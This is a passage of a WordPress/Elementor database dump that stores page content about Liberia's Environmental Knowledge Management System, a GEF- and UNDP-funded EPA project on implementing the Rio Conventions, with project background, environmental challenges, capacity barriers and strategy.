knowledge. Universities and research centers will be at the center of the information and knowledge management and will ensure the integration of innovative scientific and technical information into the project setup and into other baseline initiatives.<\\/p>\\n<p>The project\\u2019s approach to knowledge management is consistent with the International Resource Panel Report on Policy Coherence of the Sustainable Development Goals which emphasizes the need for developing widespread awareness and creating and disseminating decision support tools.<\\/p>\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bcde0a7\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ee75b34\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"20\"},\"elements\":[{\"id\":\"71ce863\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"f710f0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"5403a84\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"5a46832\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"9ac7a19\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"25aa8f3\",\"elType\":\"widget\",\"settings\":{\"title\":\"What does the EKMS include?\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"9c544f7\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<!-- wp:paragraph -->\\n<p>The Environmental Knowledge Management System (EKMS) is an integrated online knowledge platform which strive to draw on and complement a growing agenda on the Rio Conventions within the Natural Resource Management Sector and external partners to scale up environmental initiatives.<\\/p>\\n<!-- \\/wp:paragraph -->\\n\\n<!-- wp:paragraph -->\\n<p>The EKMS provides free and open access to information from key government and other institutions in Liberia relating to the implementation of the Rio Conventions \\u2013 The United Nations Framework Convention on Climate Change, The United Nations Convention to Combat Desertification, and The United Nations Convention on Biological Diversity. The EKMS is deployed under the supervision of Environmental Protection Agency (EPA) in collaboration with twelve relevant government institutions. Information access on this platform include reports, publications, case studies, tools and guidelines, institution\\u2019s technical documents, and other related materials.<\\/p>\\n<!-- \\/wp:paragraph -->\\n\\n<!-- wp:paragraph -->\\n<p>Additionally, the EKMS provides a platform for government institutions and other contributors to share latest blogs, news and stories related to the Rio Conventions implementation process.<\\/p>\\n<!-- \\/wp:paragraph -->\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"51302d0\",\"elType\":\"widget\",\"settings\":{\"title\":\"Acknowledgement\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5d55e03\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The EPA gratefully acknowledges financial support from the Global Environmental Facility (GEF), through the United Nations Development Programme (UNDP), for the development of this Environmental Knowledge Management System (EKMS).<\\/p>\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"8a1ae94\",\"elType\":\"widget\",\"settings\":{\"title\":\"Disclaimer\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"3162138\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The Environmental Knowledge Management System (EKMS) provides free and open access to important information from key government and partner institutions in Liberia on implementation of the Rio Conventions. The information in the EKMS is provided for informational and educational purposes only. This website contents can not be taken to reflect the views of its sponsors.<\\/p>\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(17568,2592,'_elementor_edit_mode','builder'),(17569,2592,'_elementor_template_type','wp-page'),(17570,2592,'_elementor_version','2.7.5'),(17571,2592,'_wp_page_template','default'),(17572,2592,'_elementor_data','[{\"id\":\"2ca8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c9f4c2b\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"63c1\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9149b81\",\"elType\":\"widget\",\"settings\":{\"title\":\"About the EKMS\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f7102f3\",\"elType\":\"widget\",\"settings\":{\"text\":\"Divider\",\"color\":\"rgba(122,122,122,0.36)\",\"gap\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"e346601\",\"elType\":\"widget\",\"settings\":{\"title\":\"Why was the EKMS created?\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"654b3cf\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>In an effort to bridge knowledge management gaps, the EKMS was created to strengthen institutional coordination between the Environmental Protection Agency (EPA) and Partner governmental institutions as well as non-governmental organizations that have direct linkages with environmental policies and development. It was also created to increase access and dissemination of key information and promote adequate public awareness and education.<\\/p>\\n<p>The EKMS is an output of the Cross-Cutting Capacity Development Project (CCCD). The project funded by the GEF and implemented by the EPA in partnership with the UNDP in collaboration with Natural Resources Management Agencies of Liberia. The project is in line with GEF-6 CCCD Strategy objective 1, 3, and 5 which call for countries to: a) integrate global environmental needs into management information systems and monitoring, b) integrate MEA provisions into national policy, legislative, and regulatory frameworks, and c) update NCSAs, respectively.<\\/p>\\n<h3>Development Challenge<\\/h3>\\n<h4>A1. Global Environmental Challenges<\\/h4>\\n<p>Liberia is located on the southwest coast of Africa, and boarders the Ivory Coast, Guinea, and Sierra Leone. Liberia is divided into 15 counties, which are subdivided into 90 districts. Although Liberia is a rather small country, it has significant biodiversity. There are 600 bird species, 150 mammals, 75 reptiles and over 2000 flowering plants. Some notable species in Liberia include western chimpanzees, forest elephants, and leopards. Liberia also has rich forests; around 42% of the Upper Guinea Forest of West Africa is contained within Liberia (Republic of Liberia, 2014; Republic of Liberia, 2004). Liberia also has numerous natural resources such as timber, rubber, gold diamonds, and iron ore. Economically, the forestry and agriculture sectors are two of the most important sectors in Liberia. Agriculture accounts for over 70% of livelihoods (Dorliae, 2012).<\\/p>\\n<p>Liberia faces numerous environmental challenges including land degradation, fragmentation, deforestation, soil erosion, and pollution. The dependence on forestry presents a unique environmental risk as Liberia\\u2019s forest is part of the West African Hotspot. This (once) rich ecosystem has faced severe deforestation; only ten percent of the original forest remains, of which around 40% lies in Liberia. Unfortunately, this remaining forest is at risk serious risk of deforestation. Over the past two centuries, Liberia has lost over 60% of its forest cover (Republic of Liberia, 2004), and deforestation rates have increased since 2000. Increases in deforestation and land degradation are largely due to displaced people clearing land. Also contributing to deforestation, biodiversity loss, and land degradation is unsustainable farming practices, mining, charcoal production, invasive species, hunting, and unregulated timber extraction. Poaching is also rampant and mitigation measures are lacking; the draft Wildlife Management and Protected Areas Act remains in draft form (Dorliae, 2012).<\\/p>\\n<p>Climate change also poses a real threat to Liberia. Among other threats, Liberia\\u2019s economy and human health could be threatened by rising temperatures and water scarcity. Currently, the country does not have strong capacities for mitigation and adaptation; Liberia has no institutions that offer climate change education or research programs (although, the University of Liberia does offer programs on the environment). Additionally, there are no organized or coordinated programs for meteorological, hydrological, or climate research and observation. Currently, only fragmented services are available. Along with a lack of observation networks, government bodies are hindered by inadequately-trained staff (Environmental Protection Agency of Liberia, 2013).<\\/p>\\n<p>Although aware of the environmental situation, Liberia has struggled to address these environmental issues. The civil wars, which lasted for more than 10 years, served to exacerbate the situation. Poverty also presents a serious challenge; causing degradation and drawing attention and resources from environmental concerns. Over 60% of Liberians live in poverty. Of these, over 40% of citizens live in extreme poverty (Dorliae, 2012). The outbreak of Ebola in 2014 also threatened Liberia\\u2019s progress, as the crisis became a priority for the government and stretched already limited resources. Fortunately in January 2016 the outbreak was declared resolved. Overall, there has been slow progress in sustainable development and meeting obligations under the Rio Conventions.<\\/p>\\n<h4>Root Causes<\\/h4>\\n<p>There are a few key root causes of environmental degradation in Liberia. The most critical include: human settlements and population pressures; shifting cultivation; timber exploitation; and rubber plantations. More generally, root causes are related to over-exploitation of biological resources; poverty; political instability and wars; education; and inadequate law enforcement (Republic of Liberia, 2004). From a reporting perspective, one root cause of Liberia\\u2019s development challenges is the fact that Focal Points are located in different agencies, which thereby limits coordination and collaboration between them.<\\/p>\\n<h4>A2. Capacity Barriers<\\/h4>\\n<p>Liberia has undertaken numerous initiatives to address environmental issues. Despite the achievements Liberia made, Liberia continues to face important challenges to meeting environmental goals. As a Rio Convention mainstreaming project, the proposed strategy sets out to meet barriers identified in Liberia\\u2019s 2006 National Capacity Self-Assessment (NCSA), which was undertaken though a consultative process and participatory approach that involved numerous stakeholders from various sectors. Through the inclusive and consultative process of the NCSA, stakeholders identified a number of areas that explain the difficulty in fulfilling the obligations of the Rio Conventions. The NCSA identified the following barriers that cut across the three Rio Conventions:<\\/p>\\n<ul>\\n<li style=\\\"list-style-type: none;\\\">\\n<ul>\\n<li style=\\\"list-style-type: none;\\\">\\n<ul>\\n<li>Inadequate public awareness and education\\/training<\\/li>\\n<li>Inadequate institutions and institutional frameworks<\\/li>\\n<li>Inadequate political commitment<\\/li>\\n<li>Inadequate planning skills and resources, as well as incomplete structures at all levels of policy implementation<\\/li>\\n<li>Inadequate financial resources and economic framework<\\/li>\\n<li>Inadequate strategic plans and implementation<\\/li>\\n<li>Inadequate access to information<\\/li>\\n<li>Inadequate policies and legal frameworks<\\/li>\\n<li>Low level of involvement of civil society<\\/li>\\n<li>Inadequate natural resources management systems<\\/li>\\n<li>Lack of institutional capacities<\\/li>\\n<li>Lack of effective mechanism for information processing and sharing<\\/li>\\n<li>\\n<p>Poor governance<\\/p>\\n<\\/li>\\n<\\/ul>\\n<\\/li>\\n<\\/ul>\\n<\\/li>\\n<\\/ul>\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"265f48f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Liberia\\u2019s Agenda for Transformation 2012-2017 confirmed many of the barriers identified in the NCSA. Specifically, the agenda noted the following barriers:<\\/p>\\n<ul>\\n<li>Weak technical, administrative and managerial capacities;<\\/li>\\n<li>Weak institutional coordination;<\\/li>\\n<li>Unclear policies and mechanisms to enable effective participation by especially non-state actors; at the national and local levels;<\\/li>\\n<li>Limited stakeholder participation in planning and decision-making processes;<\\/li>\\n<li>Limited dissemination of key information (Republic of Liberia, 2013).<\\/li>\\n<\\/ul>\\n<p>Barriers were also reaffirmed in the Liberia Constraints Analysis (Government of Liberia, 2013).<\\/p>\\n<h4>A.3 Consistency with National Priorities<\\/h4>\\n<p>The country has demonstrated a desire to improve the environmental policy framework with the preparation of multiple new policies including the National Environmental Protection and Management Law (2003), the National Environmental Policy (2003), the establishment of an Environmental Protection Agency, in 2003, the National Forestry Law (2000), and the New Mineral and Mining Laws (2000).<\\/p>\\n<p>In the first Poverty Reduction Strategy, the environment was considered a cross-cutting issue. Some achievements made during implementation of this strategy include passage of the Community Rights Law, which established a system for community harvesting of forests. Efforts were also undertaken to improve protected areas management and increase the size\\/number of protected areas. In Liberia\\u2019s medium-term Poverty Reduction Strategy II (2012-2018) there is a fifth pillar: Cross-Cutting Issues which includes the environment. Additionally, environmental issues have been integrated into other pillars of the strategy specifically the economic pillar.<\\/p>\\n<p>During the Liberia Rio +20 National Consultative Workshop, Liberia identified five issues that are essential for accomplishing its development goals and objectives. Additionally, Liberia has also developed a National Capacity Development Strategy (2010), which calls for investing in areas needed to achieve development goals.<\\/p>\\n<p>The project will assist the Government of Liberia to achieve the national priorities it has set in Liberia RISING 2030. The aim of this is to transform Liberia through a new development strategy, which was launched in December 2012. The overall objective is to turn Liberia into a middle income country by 2030.<\\/p>\\n<p>The project is also in line with Liberia\\u2019s National Biodiversity Strategy and Action Plan II (NBSAP) which aims to, as part of Liberia\\u2019s commitment to the Millennium Development Goals, and in line with the National Environmental Policy of Liberia, assist the people of Liberia to acknowledge and exercise responsible stewardship over biological resources to meet the needs of the present without endangering the ability of future generations to meet their own needs. Some of the goals are to protect critical ecosystems, create biodiversity awareness, and increase commitment to sustainable use of biological diversity (Republic of Liberia, 2017).<\\/p>\\n<p>Liberia\\u2019s 2008 National Adaptation Plan of Action (NAPA), as a response to the impacts of climate change, aligns with National Environmental Policy which calls for the sustainable management of Liberia\\u2019s environment and natural resources. The NAPA also aims to establish synergies between adaptation and national development plans, such as the National Reconstruction and Development Plan, Millennium Development Goals, and the National Biodiversity and Strategy Action Plan. The NAPA identifies key adaptation needs and list priority actions, such as enhancing resilience to increasing rainfall variability through agriculture, to address the needs.<\\/p>\\n<p>This project is also in line with Liberia\\u2019s UNDAF 2013-2017. The UN Country Team decided that the new UNDAF would also take into account the requirements of Delivering as One. Thus, in addition to the Strategic Framework and Results Matrix, the UNDAF is accompanied by a detailed Costed Action Plan. Together they constitute the One Programme. The four pillars of the One UN Programme are:<\\/p>\\n<ul>\\n<li>Peace, Security, Rule of Law<\\/li>\\n<li>Sustainable Economic Transformation<\\/li>\\n<li>Human Development<\\/li>\\n<li>Inclusive Governance and Public Institutions<\\/li>\\n<\\/ul>\\n<p>The UNDAF (One Programme) also aligns with Liberia\\u2019s National medium-term strategy, known as the Agenda for Transformation. The Agenda for Transformation is based on five pillars:<\\/p>\\n<ul>\\n<li>Peace, Security and Rule of Law<\\/li>\\n<li>Economic Transformation<\\/li>\\n<li>Human Development<\\/li>\\n<li>Governance and Public Institutions<\\/li>\\n<li>Cross-cutting issues<\\/li>\\n<\\/ul>\\n<p>The Agenda contains a specific goal to improve management of the environment to safeguard sustained economic development and growth. Specific actions called for in this agenda include: a) developing environmental quality standards and regulatory tools; b) harmonizing environmental laws and policies to ensure improved environmental management; c) undertake a gap analysis of sectoral environmental laws and policies; d) create environmental awareness; e) create training and education programmes; f) develop a public awareness strategy and campaign; g) train professionals in effective environmental management; strengthen environmental units in ministries through training and improved coordination; and h) develop a system to collect and disseminate environmental information\\/data.<\\/p>\\n<p>The design and implementation of the proposed CCCD project would also take into account the development plans of other bilateral and multilateral donors in Liberia to ensure appropriate alignment as well as to leverage the necessary co-financing.<\\/p>\\n<h4>A.4 Baseline Scenario and Associated Baseline Projects<\\/h4>\\n<p>Liberia is struggling to fulfill many of the objectives set forth in the Rio Conventions. Many of the developed frameworks and plans for action face limited implementation due to limited government resources, limited human capacity, and a lack of appropriate technologies. Liberia struggles with an inadequate system for information and knowledge management and the poor information sharing between or within sectors. Additionally, the country\\u2019s degraded and limited infrastructure combined with a low technical and institutional capacity severely limit Liberia\\u2019s environmental governance framework and thus its potential to conserve the natural environment, let alone secure long-term benefits from it. The civil war only exacerbated the situation, leading to displacement of individuals and unprecedented amounts of resource exploitation. Although Liberia is recovering from the war, 85% of the population still lives below the international poverty line. Liberia\\u2019s HDI (2014) is 0.430, ranking the country 177 out of 188 (UNDP, 2015).\\u00a0<\\/p>\\n<p>Multilateral donor agencies specifically in the field of natural resource management currently working in Liberia now include the African Development Bank, GEF, IFAD, UNDP, and the World Bank. Bilateral donor agencies are also very important development partners from, Norway, and the United States (USAID), as well as other inter-governmental organizations such as the CARE International, Conservation International, and the Society for the Conservation of Nature in Liberia.\\u00a0<\\/p>\\n<p>National environmental NGOs, with assistance from Conservation International, organized themselves into the Alliance for Conservation in Liberia. The goal of this body is to ensure that all local NGOs who are or would like to be involved in conservation of biodiversity can do so without overlapping efforts or functions.\\u00a0<\\/p>\\n<p>Liberia has made significant progress since the end of the civil war by investing in infrastructure, revising existing policies and laws, and reviewing the mandates of political institutions to reduce duplication. One area of progress is updating the mandates and restructuring Government ministries and agencies to improve effectiveness and efficiency. Liberia has also established new agencies like the Rural and Renewable Energy Agency to promote the sustainable development strategy. Reforms in Liberia have been undertaken on an institution-by-institution basis and have not been considered on a holistic basis, nor have they increased coordination and harmonization.\\u00a0<\\/p>\\n<p>Between 2010 and 2012, UNEP implemented a global project, entitled Piloting Integrated Processes and Approaches to Facilitate National Reporting to Rio Conventions that included Liberia as a beneficiary country. This project focused on helping Liberia (among other countries) to better organize modalities for accessing and preparing their national reports. Notwithstanding the capacities developed, a number of important capacities remained to be developed, such as the standardization of data collection and information analysis, improved coordination and collaboration to facilitate streamlined national reporting, and increased awareness and stakeholder engagement in the national reporting process. During the project implementation, activities under component 4 will undertake an updated assessment of the systemic, institutional, and individual capacities that remain a priority to be developed in order to meet and sustain Rio Convention obligations.<\\/p>\\n<p>A description of on-going projects that this project will coordinate with appears in section C.4 Partnerships. Relevant completed UNDP GEF projects that form the baseline of this project include:<\\/p>\\n<h4>Associated Baseline Projects<\\/h4>\\n<table style=\\\"width: 100%;\\\">\\n<tbody>\\n<tr>\\n<th><strong>Project Name<\\/strong><\\/th>\\n<th><strong>Description of project\\u2019s alignment with CCCD project<\\/strong><\\/th>\\n<\\/tr>\\n<tr>\\n<td>GEF Enhancing Resilience to Climate Change by Mainstreaming Adaption Concerns into Agricultural Sector Development in Liberia (Ending September 2015)<\\/td>\\n<td>The expected results of this project included improving the rural communities\\u2019 capacities, increasing sustainable livestock and crop production, and reducing poverty.<\\/td>\\n<\\/tr>\\n<tr>\\n<td>FAO to Support MOA Statistics and Information Management System<\\/td>\\n<td>The objective of this project was to support the implementation of a linked information and knowledge system.<\\/td>\\n<\\/tr>\\n<tr>\\n<td>Smallholder Agricultural Productivity Enhancement and Commercialization Project (SAPEC)<\\/td>\\n<td>The goal this project was to reduce rural poverty and household food insecurity. One component is capacity building and institutional strengthening, which includes trainings.<\\/td>\\n<\\/tr>\\n<\\/tbody>\\n<\\/table>\\n<h3>B. Strategy<\\/h3>\\n<h4>B.1 Alternative Strategies<\\/h4>\\n<p>During the conceptualization of the present cross-cutting capacity development project, a number of alternative approaches were considered, taking into account the current set of interventions currently underway and planned for Liberia. An important starting point was the findings and recommendations of the National Capacity Self-Assessment, followed by a consideration of the lessons learned from other projects, such as a review of the Final Evaluation of the Mainstreaming and Capacity Building for Sustainable Land Management project . A review of the recommendations contained in the more recent Rio Convention reports was also considered, such as the 2016 National Biodiversity Strategy and Action Plan.<\\/p>\\n<p>The single most common cross-cutting capacity development constraint that was recurring in the various assessments and action plans was the significantly low institutional capacity for managing data and information for improved planning and decision-making to meet and sustain Rio Convention obligations. Taking into account the GEF-6 Cross-Cutting Capacity Development priority of strengthening mainstreaming capacities as a strategy to meet the duality of national development and global environmental priorities, this project\\u2019s objective was formulated.<\\/p>\\n<p>From an implementation perspective, a number of alternative approaches were considered to meet the stated objective. One was for Liberia to continue the same approach of implementing focal area projects, and to strengthen the key set of systemic, institutional, and individual capacities through focal area projects. However, this approach will not address the capacity development gaps nor result in creating synergies. Another aspect considered was to have different components executed by different agencies. The challenge with this approach is the relative weak coordination among government ministries and agencies \\u2013 indeed an important capacity development need that the project would help address. A related issue was the government\\u2019s keen desire to use the project to strengthen national capacity of the Environmental Protection Agency.<\\/p>\\n<p>The selected strategy was based on the real need to strengthen meaningful capacities that can be successfully institutionalized. The key here is not for the project to take on more than the Environmental Protection Agency can absorb, but rather, through the process of project execution, learn how to formulate better plans and make better decisions regarding the global environment within the framework of their institutional mandates. That is, this project places a premium on address institutional sustainability by emphasizing the execution of the project through a wide range of learning-by-doing exercises by the EPA. This will require that they reach out of other government ministries and agencies to meet complementary and shared mandates as well as to effectively negotiate resolution of real or perceived conflicts of interests that come about through Rio Convention mainstreaming.<\\/p>\\n<h4>B.2 Selected Scenario<\\/h4>\\n<p>This project is in line with the GEF-6 CCCD Strategy objective 1, 3, and 5 which call for countries to: a) integrate global environmental needs into management information systems and monitoring, b) integrate MEA provisions into national policy, legislative, and regulatory frameworks, and c) update NCSAs, respectively.<\\/p>\\n<p style=\\\"background-color: lightgray;\\\">The uniqueness of this project is centered on its cross-cutting nature. Other projects currently under implementation focus on strengthening targeted capacities under one of the three Rio Conventions, and thus have a relatively narrower system boundary than the CCCD programme approach. In the absence of the CCCD project, there remains likelihood that Liberia would not realize its full potential for sustainable development due to limited coordination and decentralization. Additionally, it is likely that environmental management in Liberia would continue to focus on traditionally narrow constructs.<\\/p>\\n<h4>B.3 Knowledge Management<\\/h4>\\n<p>This project is part of a portfolio of capacity building interventions in Liberia that encourages regional cooperation and knowledge and information exchanges. Partnerships and collaboration will also catalyze the transfer of knowledge and competencies among actors and stakeholders. Lessons learned from other projects will be included, as appropriate (for example, in the training programmes and the knowledge management system). This project also contains specific activities to increase the use and sharing of knowledge, and to strengthen critical thinking in understanding the implications of the global environment towards the pursuit of sustainable development. These include a series of learning-by-doing workshops and public dialogues among a diverse set of stakeholders. Component one focuses on establishing a system for collecting and sharing information and data between the institutions for better environmental management and the fulfillment of the obligations of the Rio Conventions (an EKMS).<\\/p>\\n<p>The system that the project will strengthen is the ideal platform to share lessons learned and experiences with the main stakeholders of environmental information and knowledge. Universities and research centers will be at the center of the information and knowledge management and will ensure the integration of innovative scientific and technical information into the project setup and into other baseline initiatives.<\\/p>\\n<p>The project\\u2019s approach to knowledge management is consistent with the International Resource Panel Report on Policy Coherence of the Sustainable Development Goals which emphasizes the need for developing widespread awareness and creating and disseminating decision support tools.<\\/p>\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bcde0a7\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ee75b34\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"20\"},\"elements\":[{\"id\":\"71ce863\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"f710f0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"5403a84\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"5a46832\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"9ac7a19\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"25aa8f3\",\"elType\":\"widget\",\"settings\":{\"title\":\"What does the EKMS include?\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"9c544f7\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<!-- wp:paragraph -->\\n<p>The Environmental Knowledge Management System (EKMS) is an integrated online knowledge platform which strive to draw on and complement a growing agenda on the Rio Conventions within the Natural Resource Management Sector and external partners to scale up environmental initiatives.<\\/p>\\n<!-- \\/wp:paragraph -->\\n\\n<!-- wp:paragraph -->\\n<p>The EKMS provides free and open access to information from key government and other institutions in Liberia relating to the implementation of the Rio Conventions \\u2013 The United Nations Framework Convention on Climate Change, The United Nations Convention to Combat Desertification, and The United Nations Convention on Biological Diversity. The EKMS is deployed under the supervision of Environmental Protection Agency (EPA) in collaboration with twelve relevant government institutions. Information access on this platform include reports, publications, case studies, tools and guidelines, institution\\u2019s technical documents, and other related materials.<\\/p>\\n<!-- \\/wp:paragraph -->\\n\\n<!-- wp:paragraph -->\\n<p>Additionally, the EKMS provides a platform for government institutions and other contributors to share latest blogs, news and stories related to the Rio Conventions implementation process.<\\/p>\\n<!-- \\/wp:paragraph -->\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"51302d0\",\"elType\":\"widget\",\"settings\":{\"title\":\"Acknowledgement\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5d55e03\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The EPA gratefully acknowledges financial support from the Global Environmental Facility (GEF), through the United Nations Development Programme (UNDP), for the development of this Environmental Knowledge Management System (EKMS).<\\/p>\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"8a1ae94\",\"elType\":\"widget\",\"settings\":{\"title\":\"Disclaimer\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"3162138\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The Environmental Knowledge Management System (EKMS) provides free and open access to important information from key government and partner institutions in Liberia on implementation of the Rio Conventions. The information in the EKMS is provided for informational and educational purposes only. This website contents can not be taken to reflect the views of its sponsors.<\\/p>\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(17573,2592,'_elementor_controls_usage','a:5:{s:7:\"heading\";a:3:{s:5:\"count\";i:5;s:15:\"control_percent\";i:0;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:13:\"section_title\";a:1:{s:5:\"title\";i:5;}}s:5:\"style\";a:1:{s:19:\"section_title_style\";a:2:{s:11:\"title_color\";i:4;s:21:\"typography_typography\";i:2;}}}}s:7:\"divider\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:1:{s:5:\"style\";a:1:{s:21:\"section_divider_style\";a:2:{s:5:\"color\";i:1;s:3:\"gap\";i:1;}}}}s:11:\"text-editor\";a:3:{s:5:\"count\";i:5;s:15:\"control_percent\";i:1;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:14:\"section_editor\";a:1:{s:6:\"editor\";i:5;}}s:5:\"style\";a:1:{s:13:\"section_style\";a:1:{s:10:\"text_color\";i:5;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:4;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:6:\"layout\";a:1:{s:6:\"layout\";a:1:{s:12:\"_inline_size\";i:2;}}}}s:7:\"section\";a:3:{s:5:\"count\";i:3;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:6:\"layout\";a:2:{s:16:\"section_parallax\";a:1:{s:24:\"jet_parallax_layout_list\";i:3;}s:17:\"section_structure\";a:1:{s:9:\"structure\";i:1;}}}}}'),(17575,2594,'_elementor_controls_usage','a:0:{}'),(17577,2594,'_ca_post_type','68'),(17578,2593,'_edit_last','1'),(17579,2593,'_elementor_controls_usage','a:0:{}'),(17580,2593,'_ca_handle','0'),(17581,2593,'_ca_host','sidebar'),(17582,2593,'_ca_merge_pos','0'),(17583,2593,'_edit_lock','1574241905:1'),(17585,2596,'_menu_item_type','custom'),(175